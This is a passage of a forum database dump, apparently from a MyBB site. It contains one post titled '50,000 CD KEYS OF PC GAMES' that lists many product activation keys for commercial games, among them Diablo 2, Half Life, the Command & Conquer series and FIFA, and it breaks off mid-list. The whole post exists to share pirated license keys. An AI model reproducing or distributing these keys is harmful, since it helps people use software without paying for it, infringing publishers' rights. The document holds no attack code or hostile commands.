'0', '0', '1', '0d90ae9272d871f5f212eb008465eb7c', '0', '0'); INSERT INTO mybb_posts VALUES('5466', '980', '0', '43', '50,000 CD KEYS OF PC GAMES', '0', '62', 'R?????zo?', '1350597412', 'BIG LIST:\r\n\r\n[SPOILER]1503 A.D.: A New World\r\n----------------\r\n5447-7278892-7648258-2126\r\n9750-0553133-8300899-5758\r\n2012-1236143-5723266-5867\r\n3475-0914223-0632734-6745\r\n9385-8677964-7296207-4572\r\n\r\n1503 A.D.: Treasures, Monsters and Pirates\r\n----------------\r\n7TWN-CFQM-T2B3-7F2K-KEPX\r\nHGEE-77DC-J86W-F9WG-S8FN\r\nV9L4-5L3C-BQKF-J6AJ-JW37\r\nP99R-H5W5-GM62-NETL-URNP\r\nPPDM-UNW3-7VRQ-3NWE-RPE2\r\n\r\nAge of Mythology\r\n----------------\r\nXDWXF-2JCVG-VTX6T-6KYQ9-QDC4G\r\nRD4D4-B94XK-QVWFP-K9PJD-GVRV3\r\nQVW83-4MC67-FDPTH-49PT8-6HGRD\r\nP3HM4-WDM27-662XW-9BPTV-CFVMQ\r\nHYQRH-FV79R-RHHPW-23G37-BDM76\r\n\r\nAge of Mythology: The Titans\r\n----------------\r\nB23B7-JTKPR-4TQT3-HXGD6-HXY96\r\nT2HB2-G4PK6-MQPDR-CTYPQ-64JK6\r\nXG9Q9-TJCWG-MKV2Q-TGBFK-KP8K6\r\nBQBBY-4T8MK-8TP28-GRHJ4-2RP7G\r\nJXFTX-YRVX6-YRRYQ-PBTXP-4YKHG\r\n\r\nAxis and Allies\r\n----------------\r\n1005-493D-C922-17D3\r\n1201-7333-7458-686D\r\n1705-3453-2570-A0F9\r\n1022-7053-5324-7ACC\r\n1627-4420-0243-523D\r\n\r\nBattlefield 1942\r\n----------------\r\n6349-9020371-9806846-2830\r\n4964-1668346-7637006-2960\r\n6599-4055214-4745454-2456\r\n2203-7294876-7652422-1340\r\n6801-1528034-1442448-3626\r\n\r\nBattlefield 1942: Secret Weapons of WWII\r\n----------------\r\n3QHZ-KBBE-ZPQV-VDS3-U5MA\r\nANXX-ZKF8-5RZG-SWFK-M2UZ\r\nSST3-A9PL-G7GN-856A-PMAW\r\nQFC4-T7Q6-33EQ-LUHP-96ZP\r\nNH2J-AJ5Y-8JJ9-KFGE-QLKK\r\n\r\nBattlefield 1942:The Road to Rome\r\n----------------\r\n0777-4826524-6288328-2359\r\n6413-6941923-0559983-3822\r\n1768-8264649-8295359-3044\r\n0741-8677977-4365014-4911\r\n0256-0695274-2401207-5319\r\n\r\nBattlefield Vietnam\r\n----------------\r\nHJSJ-ND22-REVP-QH5N-J67W\r\nWA77-2BMM-2TLG-CR43-2L5M\r\nTPKK-QJ8R-BBVY-4TVM-8XLX\r\nMXZZ-WTZ2-YELT-L8QQ-SGZ2\r\nCDF7-2L2D-4QKK-2329-VG9J\r\n\r\nBig Scale Racing\r\n----------------\r\nA4FL-2BTO-E8WN-2ESU\r\n93GI-44MP-80GI-B4MP\r\n1EGO-E5AI-66SG-23AY\r\nD303-CA11-8356-E548\r\n7A84-EB75-7454-4282\r\n\r\nBlack and White\r\n----------------\r\n5615-5218520-3198589-3037\r\n9545-4379446-1230565-7092\r\n1334-5330370-2292790-4422\r\n7450-7423821-6747420-6866\r\n4796-5617828-4021917-4194\r\n\r\nBlack and White: Creature Isle\r\n----------------\r\n7622-1467955-6016762-0529\r\n2891-6593534-1909669-1431\r\n7310-9173434-7386602-0753\r\n4153-8092897-3409943-5649\r\n9688-6176943-7166216-4217\r\n\r\nBreed\r\n----------------\r\nHK7H9-RM4WL-N97NR-TGMXH-RTR3C\r\nXXEME-W99GG-W7ERH-39RGT-MW7HE\r\nR34RE-KNHLH-HTERG-LMKMH-CG7T9\r\n4C3N4-XTEEG-GE9KE-4CHMG-9R3L7\r\nN3KEN-3KHNN-GCM9R-RL7XN-9CMH9\r\n\r\nCall of Duty\r\n----------------\r\nHKPH-WT3S-8XHU-2YHW-46C4\r\nY2SG-8W4P-4YYU-SXY8-5A89\r\nKUP8-GX2H-K8SY-P2KG-90EF\r\nTGYT-UPEK-GKUE-WTTU-F9E3\r\nX42D-8GXD-HXS2-TGX8-1AD0\r\n\r\nCall of Duty: United Offensive\r\n----------------\r\n74B3-JN4N-4WT4-WRHN-64BF\r\nBZTZ-UWG7-UNTN-J7RN-BDE5\r\nDUSU-3TSU-GETW-TYHY-7146\r\n81C5-AB2T-8ZQ9-ESSE-46TZ\r\nN4XK-7TRU-WRDB-JDUT-C4D4\r\n\r\nCatwoman\r\n----------------\r\n7JEN-FFXT-E9JW-QN99-BJB6\r\nDC4L-ACZF-W9J6-8EVA-7QVK\r\nKLHH-EWUM-NL7L-9EFK-55GQ\r\nKZ2J-YGTH-BMRK-A53R-NHVH\r\nT5NW-7TWB-4F5F-L27D-BD22\r\n\r\nChrome\r\n----------------\r\n7XBYF-E7BW2-FCAP3-YPIFL\r\n6TLMS-5UVWA-F8333-G2PCR\r\nTAPES-7W9GJ-BPE4Z-8IGLW\r\n6JMYB-CTGPT-ESR4X-Z7UMX\r\n2MWZF-C7FWI-6TJK2-PCSLX\r\n\r\nCommand & Conquer Generals\r\n----------------\r\n8647-5232955-9878125-6046\r\n9870-3450510-3133911-0726\r\n4511-1729151-9897130-2429\r\n5755-2361463-3448299-3710\r\n5773-7726562-6842888-1323\r\n\r\nCommand & Conquer Generals: Zero Hour\r\n----------------\r\nYNEN-2FQN-JRYA-G3AB-JSX3\r\n47HH-LWW6-F8AG-AQ7V-2GDP\r\n47P7-JEQX-3CLY-7X53-S5K4\r\nTDLU-665P-JYU5-5ASP-R246\r\nXEJ2-L8YD-D7T3-6RCV-2G6V\r\n\r\nCommand & Conquer Red Alert 2\r\n----------------\r\n023093-408048-703486-5751\r\n026929-458543-625750-0149\r\n024971-477113-030353-1433\r\n022921-207519-387995-8278\r\n030119-499472-709335-3679\r\n\r\nCommand & Conquer Red Alert 2:Yuri\'s Revenge\r\n----------------\r\n046289-119931-094801-3903\r\n\r\n047653-310394-811521-8281\r\n049442-251271-777606-6959\r\n051293-740133-308111-8676\r\n046259-657889-882161-5974\r\n\r\nCommand & Conquer Renegade\r\n----------------\r\n061991-914060-171113-5190\r\n056629-874691-293836-0722\r\n064016-686792-796977-2716\r\n057225-538796-853287-6511\r\n060596-686641-669815-8850\r\n\r\nCommand & Conquer Tiberian Sun\r\n----------------\r\n685618-936422-961962-7039\r\n835452-395171-622239-3092\r\n257044-656814-148128-3482\r\n601662-875090-962214-1926\r\n169044-690442-019375-9514\r\n\r\nComanche 4\r\n----------------\r\nKGQJ-8M68-7JQW-DUCV-WLC6\r\n3S2D-FLT1-CLS2-RULE-7865\r\n36V8-BLMT-MXWY-EULX-YMSJ\r\n\r\nCounter Strike\r\n----------------\r\n9271-77260-7184\r\n6996-03006-9065\r\n5902-51615-6065\r\n3727-25598-3910\r\n8940-76820-2401\r\n\r\nCounter Strike:Condition Zero\r\n----------------\r\n5Z62F-CEKQD-4WCZT-TAWQH-JGLFQ\r\n54RT2-843TJ-79UJC-ZGVC5-AR3R2\r\n5ZN2H-NWHEY-RRM7H-PZAXA-GIFQJ\r\n5Z62E-MTXQZ-Z32IY-NW22l-A3C4Q\r\n5RP2E-EPH3K-BR3LG-KMGTE-FN8PY\r\n\r\nDelta Force 2\r\n----------------\r\n288T-9AJ2-CVXN-BYSS-NNZW\r\n293C-RQQ7-W2X8-DAQR-YSC4\r\nJTUH-LTHD-BCZV-HFBY-SSNN\r\n24XZ-GHAT-H7W7-C2UP-G559\r\nJSZZ-PPPW-T8BC-TV46-5WSS\r\n\r\nDelta Force: Black Hawk Down\r\n----------------\r\nQZP3-EPZW-SP5N-2XEX-H7JG\r\nQTZ3-RHZT-P5TB-LQXH-7JD3\r\nQKMT-LYAB-HIWB-ZMNW-FYPV\r\nQMVQ-NF78-GJMG-XU2B-TZ5K\r\n87HJ-AIFM-AMAO-PFCR-SMSQ\r\n\r\nDelta Force: Black Hawk Down Team Sabre\r\n----------------\r\nAV4E-YVQE-NACM-DD3M-KBW3\r\nABRR-65QC-S4AQ-S2G7-CKCG\r\nACWY-D9VK-72CJ-5S5A-9MQU\r\nA587-HGH6-HZ47-GNBT-HRNA\r\nA7YL-R5SH-MY2E-4JPA-ZJB3\r\n\r\nDelta Force:Land Warrior\r\n----------------\r\n6B4T-3BBC-DASD-D97Q-59HX\r\nN5E3-YXH2-G983-9WYB-B3ZS\r\nN7Q9-UX77-KZ3Z-332A-W4TR\r\nNTEG-6HCF-VU5D-HDMC-47S9\r\nNMBP-8MX8-ESD4-RB7S-9HKZ\r\n\r\nDelta Force:Task Force Dagger\r\n----------------\r\n7S5E-MVLM-NS6Y-4X64-HMAK\r\n7NXF-L5VB-T2AX-KSR8-EHSH\r\n743L-HGSU-SK5P-YCKS-HQLZ\r\n72YL-R4SB-GKG6-3WKS-HQ27\r\n\r\nDiablo 2\r\n----------------\r\n6PNP-D7PG-HZ8M-PZNP\r\nFX7D-82PH-FTWB-2BR2\r\n2P8D-897Z-BNNJ-PJRM\r\nEBPE-F7XN-9HWC-K97K\r\n496B-6N7G-RCV4-27EN\r\n\r\n\r\n\r\nCall of Duty: 82SH-E2WH-KPYY-EX8E-A14D[/b]\r\n\r\nCall of Duty: DEUD-WYDE-4W42-YKDW-F34D\r\n\r\nCall of Duty: WDWE-YW8Y-XWWD-TYWY-1EAF\r\n\r\nCall of Duty: TXSK-WGDY-WDSX-WPTW-1A7C\r\nC & C Generals: 1116-0553323-4206438-6378\r\nC & C Generals: 1529-4165093-5283471-0961\r\nC & C Generals: 1554-3519303-5863106-2960\r\n\r\nC & C Generals: Zero Hour: AZNE-P748-W8C4-SSWS-4E8S\r\n\r\nC & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR\r\n\r\nC & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR\r\n\r\nC & C Generals: Zero Hour: PA7F-J4AX-TD9N-92FZ-4BUR\r\nC & C Red Alert 2: 020736-428526-011875-6507\r\nC & C Red Alert 2: 022121-905624-825895-4992\r\nC & C Red Alert 2: 030645-633345-452378-0580\r\nC & C Red Alert 2 Yuri\'s Revenge: 303440-222764-534487-73438\r\nC & C Red Alert 2 Yuri\'s Revenge: 662875-454133-344823-08464\r\nC & C Red Alert 2 Yuri\'s Revenge: 075420-663711-111417-71038\r\n\r\nC & C Renegade: 056894-929488-118387-9679\r\nC & C Renegade: 056762-051968-047885-5190\r\nC & C Renegade: 056968-762379-840140-8243\r\nC & C Renegade: 056384-165067-858508-3234\r\nC & C Renegade: 056120-230755-848844-5718\r\nC & C Renegade: 056198-391485-391948-9024\r\nC & C Renegade: 056924-738095-184588-5738\r\nC & C Renegade: 056038-648693-313100-7109\r\nC & C Renegade: 056493-234166-827916-2001\r\nC & C Renegade: 056430-651581-593164-8339\r\nC & C Tiberian Sun: 008302-889914-451062-6091\r\nC & C Tiberian Sun: 010436-881681-537098-4027\r\nC & C Tiberian Sun: 263877 906189 200291 2883\r\nC & C Tiberian Sun: 266127 314485 240039 3713\r\nC & C Tiberian Sun: 781866 616595 819275 5016\r\nC & C Tiberian Sun: 781866 616595 819275 5016\r\nChaser: 52QJY-10K8V-CLNPI-1EISW-7VNP3\r\n\r\nChaser: 3RVXB-6ICGE-PYX7T-KJ9L9-LSG5H\r\n\r\nChaser: 2QIMX-NU6MT-O74UI-D9OS0-XW4N5\r\n\r\nChaser: 63PRZ-360N5-7SWUY-XR0A5-DIFCA\r\n\r\nChrome: MZIC3-MLNTS-VL45L-8MG26\r\n\r\nChrome: 53ZFH-CKE6T-3TPXJ-82W00\r\n\r\nChrome: XICVC-IZM6A-GTAHP-I4X6H\r\nClive Barker\'s Undying: 2500-0911911-09\r\n\r\nCommanche 4: 3s2d-flt1-cls2-rule-7865\r\nCommanche 4: KGQJ-8M68-7JQW-DUCV-WLC6\r\n\r\nCricket Jr 3.2.25: Név: .:i2k:. System ID: .:i2k:. Kód: CJr1-94805-YZSVI-SQ6Lv\r\n\r\nDark Age of Camelot: HAVDVIL-YATYBA9-WX18VXE-MP43QAQ-HUGUTMX\r\nDark Reign 2: gad6-teb4-cup9-pap6-5529\r\nDeep Raider: 102050000000001\r\nDelta Force 2: JTUH-LTHD-BCZV-HFBY-SSNN\r\nDelta Force 3: N5E3-YXH2-G983-9WYB-B3ZS\r\nDelta Force 3: N7Q9-UX77-KZ3Z-332A-W4TR\r\nDelta Force Task Force Dagger: 72YL-R4SB-GKG6-3WKS-HQ27\r\nDelta Force Black Hawk Down: Q96Y-LTGO-YVYE-GJBA-CWGV\r\nDelta Force Black Hawk Down: 88ER-GPOV-KCWM-EUPP-HLWP\r\nDelta Force Black Hawk Down: QKUG-DNPY-UAHT-HYFQ-LRDH\r\n\r\nDer erste Kaiser: RED2-DAD2-RAD2-DAD2-888\r\nDevastation: 5B36F-976AA-6A471-58B8D-92B7B\r\nDevastation: GUHW6-TC9VN-IMSAA-9B162-6RBR9\r\nDevastation: BQEE6-UWZM3-IMSSZ-6A2B1-3D5F3\r\nDiablo 2: LOD 6PNP-D7PG-HZ8M-PZNP\r\nDiablo 2: 4CHW-RT4M-9JPN-2G4B\r\nDiablo 2: 6EPM-27Z9-99D2-KM7B\r\nDiablo 2: 79ER-XTM4-HNDK-DWE6\r\nDiablo 2: 848J-XN72-9NZP-82FP\r\nDiablo 2: 879K-9G4N-B9CV-2CTK\r\nDiablo 2: 8DRR-VTH6-RGZ7-RT2V\r\nDiablo 2: B2PF-JGJ9-J74C-H7T2\r\nDiablo 2: BFCT-F4MN-RCH7-RDCF\r\nDiablo 2: EJ6V-BT4D-9NDC-77TF\r\nDiablo 2: FBWG-8NME-GZDW-7H9E\r\nDiablo 2: GHXX-829D-2M9T-H48W\r\nDiablo 2: HJ4E-N2MJ-XHXP-NZXV\r\nDiablo 2: J2J8-MDKZ-8G47-4KXB\r\nDiablo 2: J9NC-FTHN-PC4N-7RHH\r\nDiablo 2: KDZD-DR7W-92DX-FR8J\r\nDiablo 2: KFJH-WDNF-HGXT-HEH6\r\nDiablo 2: N64H-7J9X-JMCN-NG74\r\nDiablo 2: NDGX-TGNK-XPGE-GGWR\r\nDiablo 2: PHFF-ZGZX-ZXKZ-2G7C\r\nDiablo 2: TBKJ-B79J-N6NJ-86MB\r\nDiablo 2: TPDC-HWNF-NVMV-VCXV\r\nDiablo 2: VV86-CGKN-EVBP-T7TC\r\nDiablo 2: WEJ2-X28V-R727-VC2T\r\nDiablo 2: WVE6-RTNC-TFHG-EVXP\r\nDiablo 2: XWMN-D97T-6E6H-TPM2\r\nDiablo 2 LoD: HFCN-H9DD-PBGE-G9K9\r\nDiablo 2 LoD: EV4D-GGRZ-8DVH-H9D4\r\nDiablo 2 LoD: 6689-JDRR-B6DC-7WKZ\r\nDrome Racers: 0252-2798728-8952823-5920\r\nDrome Racers: 2186-7410760-3617868-5920\r\nDrome Racers: 2574-0811768-6410528-5503\r\nDrome Racers: 1439-8808778-3837107-0023\r\nDrome Racers: 3496-5109968-3484992-4129\r\nDrome Racers: 5533-3743808-8068198-0827\r\nDrome Racers: 9722-8289078-1586124-0933\r\nDrome Racers: 2586-2653924-6182119-2114\r\nDrome Racers: 7629-5200391-8195325-1003\r\nDrome Racers: 2586-7722941-9698255-6023\r\nDrome Racers: 4912-5083939-6799769-1518\r\nDrome Racers: 3576-6582544-1616335-0011\r\nDrome Racers: 5328-2536186-2146291-0234\r\n\r\nDiablo 2: Lord of Destruction\r\n----------------\r\nFX7D-82PH-FTWB-2BR2\r\n6PNP-D7PG-HZ8M-PZNP\r\nVCV9-N7RN-H9C4-VDBT\r\nM4ND-6TPT-GH4N-FCKX\r\nHCJJ-4DPH-988V-8HNN\r\n\r\nDoom 3\r\n----------------\r\n2DR3-ABTC-AJLB-BLJH-4C\r\nG4GE-JUMZ-BJYV-FEJU-02\r\nWHUT-TLKX-PDV3-EAQ6-70\r\nGURD-YVDJ-3LD2-W9Q8-91\r\nMZK7-4LB8-42FJ-HCNA-75\r\n\r\nDoom 3: Resurrection of Evil\r\n----------------\r\nPSBC-TASC-33WB-PH7L-C0\r\n(Later...)\r\nT7LB-BD27-TWLC-SDGD-F6\r\n\r\nDope Wars\r\n----------------\r\n373B30292B1131240889MI8770MMI7I573M288MH\r\n2D3917122B2A1F380988M8890M85J9J773M28481\r\n19123D212D19301C0I8M87MI0K84I7JI0H898884\r\n15353C253A3A3A310I8MM8857387I7JM0I8J8581\r\n381A3A3B151E1C18758987MH0K81I5I70IM48785\r\n\r\nDrome Racers\r\n----------------\r\n0252-2798728-8952823-5920\r\n2186-7410760-3617868-5920\r\n3496-5109968-3484992-4129\r\n7629-5200391-8195325-1003\r\n2574-0811768-6410528-5503\r\n\r\nEmpires: Dawn of The Modern World\r\n----------------\r\nCGAT-NPZZ-NZW8-NC8X-D096\r\nTHXH-39CZ-N898-TT44-5DF5\r\nKH9W-AWGX-4J4H-48AP-53B1\r\nXA9Z-4JW8-C9GN-KJGP-C490\r\n8P49-PP4T-WGCX-KP33-FB7B\r\n\r\nEmpire Earth\r\n----------------\r\nLES9-RUC2-TYM8-CEJ3-2727\r\nTUS5-LEF6-TEM9-MER6-7453\r\nNYR2-BAD2-GYM5-CEZ6-7337\r\nRAN6-MUG2-SYJ2-GYL7-3385\r\n\r\nEmpire Earth: Art of Conquest\r\n----------------\r\nGER2-MAN2-RAP2-PER5-2252\r\nBYB2-SAB8-WYZ5-DEB2-8489\r\nTUS2-GAC4-BAM9-SUL6-8545\r\n\r\nEmperor: Battle For Dune\r\n----------------\r\n035921-492715-312032-5217\r\n038351-947039-933217-1729\r\n040222-570718-012757-3830\r\n041392-991953-129963-0491\r\n033312-198585-776746-4264\r\n\r\nEmperor:Rise of the Middle Kingdom\r\n----------------\r\nBAC9-RAL8-SAS2-SAX2-9999\r\nRED2-DAD2-RAD2-DAD2-8888\r\nBAB2-DAD2-BAB2-DAD4-2247\r\nGAG2-FAF2-GAG2-FAF5-2257\r\nGAD2-ZUC2-GAD2-ZUC3-2225\r\n\r\nF1 2001\r\n----------------\r\n0742-8228816-4870198-0680\r\n3611-4905481-0068168-6105\r\n5094-4170872-5161062-5968\r\n8696-4686736-6168757-6367\r\n7743-2166283-2840552-8106\r\n\r\nF1 2002\r\n----------------\r\n2319-2017512-5876312-1450\r\n4812-5611292-5122399-1214\r\n9961-9180844-0056338-1331\r\n6421-9723052-9340789-0414\r\n0072-7944183-8202464-0356\r\n\r\nF1 Challenge 99-02\r\n----------------\r\n2420-1755665-2896902-5443\r\n5342-6345206-6715881-1712\r\n7454-6168039-6622391-6613\r\n0833-7134974-9213172-0365\r\n8594-3514538-3685029-2547\r\n\r\nFIFA 2002\r\n----------------\r\n4431-4955408-1776254-7055\r\n6821-3066382-6339801-8786\r\n0199-7350209-7377613-5972\r\n7967-4956526-7887198-1118\r\n1834-9368868-6082203-4882\r\n\r\nFIFA 2003\r\n----------------\r\n68M5-3DEU-JU8S-M7HX\r\n52JT-ZVDW-QNBH-2CRW\r\nK4LC-UKAW-CMDS-756J\r\nFY8E-E4GH-JF75-EKQ9\r\nTDN9-TNW8-K9PG-8NXE\r\n\r\nFIFA 2004\r\n----------------\r\n2MGQ-WYAN-24DJ-XJBJ-AJE2\r\nKUR9-QE7C-Y559-ZWC9-27Y8\r\nWUEW-VGVM-AUP3-4YPC-CMJ5\r\nMFPP-BWC8-LNFK-55WP-ZAZF\r\nHVDD-YMXN-UQAE-R4ZW-Z9AJ\r\n\r\n\r\nHint:If you need a key and think that this list is too long and find it difficult to search..\r\n\r\nHit CRTL+F and type in the name of the Game,you\'ll be there\r\n\r\n\r\n50,000 Cd Keys Of Pc Games\r\n[/size]\r\n\r\nFIFA 2005\r\n----------------\r\n7UMD-DH24-2RKP-DSAA-Y45Y\r\n2K7X-4H5D-MLM8-6WJG-BR9H\r\nQE3K-Z3VT-QYS8-25B9-9WLM\r\nGVWW-A78X-NGTZ-BKTP-UBBY\r\nB9AJ-XBMB-DUSG-YVGR-7G3T\r\n\r\nFIFA World Cup 2002\r\n----------------\r\n7603-5024040-4434988-2569\r\n7134-0040778-6000898-4059\r\n0973-0765382-4012472-2529\r\n3610-9093190-1324091-5676\r\n6308-7762342-7527510-3056\r\n\r\nFreedom Fighters\r\n----------------\r\nPLLC-8WAZ-TRSH-6QC7-NSCY\r\nPJ7F-GMAS-TRCU-4PUM-RUNH\r\nPR33-WMAH-TJV3-JSNE-8KL6\r\nPX8G-CUAT-T6Z4-6G4T-QUHU\r\nP5JA-MUAV-TEW5-3A47-AJEZ\r\n\r\nFreedom Force\r\n----------------\r\n1500-1925526-8586068-0454\r\n9722-8289078-1586124-1727\r\n5533-3743808-8068198-4528\r\n4912-5083939-6799769-1163\r\n2586-7722941-9698255-3753\r\n\r\nFrontline Attack: War Over Europe\r\n----------------\r\nPNN6-G2N7-XR3B-AHT8\r\n53XC-ZTHT-ARAP-SVBC\r\nFUBP-EYNZ-KFXC-SKM2\r\nGSB3-4F9P-WSTV-SBU6\r\n\r\nFull Spectrum Warrior\r\n----------------\r\nKCGG-EY77-SGNM-APC0\r\nJ9SK-7500-PDX0-36YY\r\nM5K8-9FC6-NU44-KSEY\r\nLLJC-L610-PDX0-0G0Y\r\n4TPK-KV00-PDX0-4J1X\r\n\r\nGalactic Civilizations\r\n----------------\r\nDN-594680-GC1-9493F34F25\r\nDN-461586-GC1-373C1A94E6\r\nDN-452966-GC1-93CC8CBB06\r\nDN-658465-GC1-CE38B1CC5E\r\nDN-155418-GC1-7C53C8930F\r\n\r\nGalactic Civilizations: Altarian Prophecy\r\n----------------\r\nDN-ULTQD7-AP1-D76BQCK297\r\nDN-DCQ632-AP1-32URD7JGFT\r\nDN-M27KBT-AP1-BTQX34FMFJ\r\nDN-YJHMB4-AP1-B458GTZNJA\r\nDN-L2UK39-AP1-396AP57XYE\r\n\r\nGangland\r\n----------------\r\nPC73B-DQ34J-MJJF8-S86QC-1PMHS-K\r\n34T9D-7LVRJ-2GCD7-GPGTT-D6Q5H-C\r\nBBM4D-1LIU6-5C781-1EQ7L-6F4RU-C\r\n3RTHF-IMPHI-HBP9V-UV7EM-T74C6-S\r\nFQAI4-PP6P6-R9P1C-V8CTF-MBLKM-4\r\n\r\nGlobal Operations\r\n----------------\r\n7589-5021487-6662554-0413\r\n5162-3570489-6270304-3721\r\n0428-8668125-5725123-2300\r\n0038-2227195-9496720-0349\r\n[b]8951-0466909-8060897-6524[/b]\r\n\r\n[b]Gore: Ultimate Soldier[/b]\r\n[b]----------------[/b]\r\n[b]6B95-AE91-9C13-E72A[/b]\r\n[b]1FFE-F2C7-0D04-F2B5[/b]\r\n[b]7FFC-A922-F489-6890[/b]\r\n[b]8003-4FFB-A603-7D16[/b]\r\n[b]2006-F662-A704-0B9F[/b]\r\n\r\n[b]Haegemonia[/b]\r\n[b]----------------[/b]\r\n[b]B5BB-C23D-BABB-0A63[/b]\r\n[b]A06B-C3B9-04D7-DEC6[/b]\r\n[b]FB8D-AAC3-B021-842E[/b]\r\n[b]E2BE-0C46-7912-DAC8[/b]\r\n[b]5848-09CC-710C-DA78[/b]\r\n\r\n[b]Haegemonia: The Solon Heritage[/b]\r\n[b]----------------[/b]\r\n[b]686E-7C7C-A117-2016[/b]\r\n[b]8F46-F170-F975-EDEB[/b]\r\n[b]085A-3424-CD86-62D6[/b]\r\n[b]4AF1-5863-C80F-C0FC[/b]\r\n[b]92EF-14B2-DA69-8D69[/b]\r\n\r\n[b]Haegemonia: Legions of Iron[/b]\r\n[b]----------------[/b]\r\n[b]BAD0-DAD0-5000-8113[/b]\r\n[b]BAD9-DAD9-5001-A112[/b]\r\n[b]BAD8-DAD8-5002-8112[/b]\r\n[b]BAD7-DAD7-5003-6113[/b]\r\n[b]DEAD-1870-5004-4538[/b]\r\n\r\n[b]Halo: Combat Evolved[/b]\r\n[b]----------------[/b]\r\n[b]K9TGM-K337P-JW24T-B9V73-C3TVW[/b]\r\n[b]T39RX-JH7Y2-XWTJD-VJX8X-G7MD8[/b]\r\n[b]VM324-F4K8W-B9CKB-79KH2-F2CBJ[/b]\r\n[b]8D69D-8BFB8-93949-5845F-FH686[/b]\r\n[b]G9Qk2-22KV6-TFXCR-V3Y9M-2CCBJ[/b]\r\n\r\n[b]Half Life[/b]\r\n[b]----------------[/b]\r\n[b]7060-92221-2785[/b]\r\n[b]5531-10604-0817[/b]\r\n[b]2837-26196-8502[/b]\r\n[b]9464-54350-6230[/b]\r\n[b]3728-42526-5629[/b]\r\n\r\n[b]Half Life 2[/b]\r\n[b]----------------[/b]\r\n[b]2489-72270-3566[/b]\r\n[b]2133-52724-9483[/b]\r\n[b]2538-92371-0140[/b]\r\n\r\n[b]Half Life: Blue Shift[/b]\r\n[b]----------------[/b]\r\n[b]1911-23143-1234[/b]\r\n[b]2691-13570-3628[/b]\r\n[b]0373-03700-6727[/b]\r\n[b]2375-73472-8605[/b]\r\n[b]2884-52653-7164[/b]\r\n\r\n[b]Half Life: Game of the Year Edition[/b]\r\n[b]----------------[/b]\r\n[b]4336-04196-6119[/b]\r\n[b]0104-23136-0366[/b]\r\n[b]2844-42442-1488[/b]\r\n\r\n[b]Half Life: Gunman Chronicles[/b]\r\n[b]----------------[/b]\r\n[b]2609-57245-0368[/b]\r\n[b]5826-95445-8263[/b]\r\n[b]1073-74181-0735[/b]\r\n[b]2147-48362-1470[/b]\r\n\r\n[b]Half Life: Initial Encounter[/b]\r\n[b]----------------[/b]\r\n[b]0176-11134-0245[/b]\r\n\r\n[b]Harry Potter: The Sorcerer\'s Stone[/b]\r\n[b]----------------[/b]\r\n[b]1683-0816698-0377119-7214[/b]\r\n[b]6496-1733723-6070637-7107[/b]\r\n[b]4500-0980084-7751600-3013[/b]\r\n[b]4512-9289626-4382245-6218[/b]\r\n[b]0901-7014788-4117807-0206[/b]\r\n\r\n[b]Harry Potter: The Chamber of Secrets[/b]\r\n[b]----------------[/b]\r\n[b]4160-6358666-6112312-0619[/b]\r\n[b]3614-7054629-4776456-8022[/b]\r\n[b]7954-3123341-1387427-3052[/b]\r\n[b]1740-9488245-5171152-5225[/b]\r\n[b]7614-2322168-5761892-3635[/b]\r\n\r\n[b]Harry Potter: The Prisoner of Askaban[/b]\r\n[b]----------------[/b]\r\n[b]DAD5-WEZR-BCLF-2AJ7-YDEV[/b]\r\n[b]5RYQ-LVAY-D2AL-GCG6-RSIG[/b]\r\n[b]JN8G-EJXA-U74Y-SMTF-FDEV[/b]\r\n[b]RSDV-EMCU-DJ7A-5XDG-FDEV[/b]\r\n[b]F755-4A6S-8P4B-SVJN-WKXC[/b]\r\n\r\n[b]Harry Potter: Quidditch World Cup[/b]\r\n[b]----------------[/b]\r\n[b]JFZR-TQFB-KWUB-THB2-2DEV[/b]\r\n[b]J7XP-URTU-JHSM-AMET-3DEV[/b]\r\n[b]V6BT-9KK2-4L4F-BE4N-7DEV[/b]\r\n[b]UGLC-5YAG-4E8J-6GWC-ADEV[/b]\r\n[b]2N44-JSJX-E8GY-7E24-NDEV[/b]\r\n\r\n[b]Harry Potter Creator[/b]\r\n[b]----------------[/b]\r\n[b]1833-7294628-2636387-0935[/b]\r\n[b]9892-9785252-5145166-0281[/b]\r\n[b]1918-0521792-6030058-2238[/b]\r\n[b]2776-8297169-5787269-0335[/b]\r\n[b]4914-5375251-9672268-2287[/b]\r\n\r\n[b]Hidden & Dangerous 2[/b]\r\n[b]----------------[/b]\r\n[b]8397-C085-DD82-E7E7[/b]\r\n[b]2787-C24C-A1E0-53C6[/b]\r\n[b]C3D2-DD00-88AD-FAAA[/b]\r\n[b]8439-D1DB-8D71-E6F8[/b]\r\n[b]4C53-3877-5831-D1EE[/b]\r\n\r\n[b]HomeWorld[/b]\r\n[b]----------------[/b]\r\n[b]BED2-BYS4-FEB2-TUL3-6653[/b]\r\n[b]BAG5-LEJ3-MAN7-SUL2-3696[/b]\r\n[b]BYS8-PUM2-TAB4-SUS2-6799[/b]\r\n[b]DAC5-XAB6-DAF6-CYW2-7965[/b]\r\n[b]DAC6-PAB2-FAF8-XAB7-4428[/b]\r\n\r\n[b]HomeWorld 2[/b]\r\n[b]----------------[/b]\r\n[b]FAG8-SUL8-NEL7-BYS8-3526[/b]\r\n[b]MAT8-LEZ9-NEN2-GUN2-4382[/b]\r\n[b]RAG7-BAM2-NEN2-WAM5-4765[/b]\r\n[b]WEW6-SUB2-MEN9-JAG8-7564[/b]\r\n[b]BEJ6-JEN3-MEB8-FUS7-8255[/b]\r\n\r\n[b]Industry Giant 2[/b]\r\n[b]----------------[/b]\r\n[b]BBKD-66NY-YTYY-85A5[/b]\r\n[b]BGNH-00IJ-MIEM-3A0F[/b]\r\n[b]ODLM-41AZ-MRRC-605A[/b]\r\n[b]OUUG-64BX-YLHZ-8BF0[/b]\r\n[b]VXOU-05ON-IOKT-8B3C[/b]\r\n\r\n[b]Island Xtreme Stunts[/b]\r\n[b]----------------[/b]\r\n[b]0969-4261038-0869656-4504[/b]\r\n[b]9483-0466288-8358793-0118[/b]\r\n[b]8489-6628363-7803262-5521[/b]\r\n[b]3041-7547168-8872139-2519[/b]\r\n[b]7126-6190880-4799523-6008[/b]\r\n\r\n[b]James Bond 007: Nightfire[/b]\r\n[b]----------------[/b]\r\n[b]8583-8951762-8789811-0551[/b]\r\n[b]6409-3390867-1486320-3107[/b]\r\n[b]7086-3754973-3585481-3827[/b]\r\n[b]7330-6713941-5762780-2731[/b]\r\n[b]6953-0066911-8667463-6034[/b]\r\n\r\n[b]Joint Operations: Typhoon 